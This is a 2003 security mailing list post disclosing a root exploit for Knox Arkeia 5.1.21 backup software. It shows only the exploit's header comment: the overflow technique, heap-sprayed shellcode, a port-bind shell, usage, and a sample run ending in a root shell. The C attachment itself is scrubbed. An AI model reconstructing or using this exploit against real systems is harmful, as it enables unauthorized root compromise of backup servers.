Message-ID: <20030919173643.84384.qmail@web20502.mail.yahoo.com>
From: bugtraq_vuln at yahoo.com (A. C.)
Subject: Knox Arkeia 5.1.21 local/remote root exploit

Exploit attached for Knox Arkeia Pro v5.1.21 backup
software from http://www.arkeia.com.

 
 

/*
 * Knox Arkeia arkiead local/remote root exploit.
 *
 * Portbind 5074 shellcode
 *
 * Tested on Redhat 8.0, Redhat 7.2, but all versions are presumed vulnerable.
 *
 * NULLs out least significant byte of EBP to pull EIP out of overflow buffer.
 * A previous request forces a large allocation of NOP's + shellcode in heap
 * memory.  Find additional targets by searching the heap for NOP's after a
 * crash.  safeaddr must point to any area of memory that is read/writable
 * and won't mess with program/shellcode flow.
 *
 * ./ark_sink host targetnum
 * [user@...t dir]$ ./ark_sink 192.168.1.2 1
 * [*] Connected to 192.168.1.2:617
 * [*] Connected to 192.168.1.2:617
 * [*] Sending nops+shellcode
 * [*] Done, sleeping
 * [*] Sending overflow
 * [*] Done
 * [*] Sleeping and connecting remote shell
 * [*] Connected to 192.168.1.2:5074
 * [*] Success, enjoy
 * id
 * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
 *
 *
 */

 


-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: ark_sink.c
Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20030919/ab22d1b4/ark_sink.c
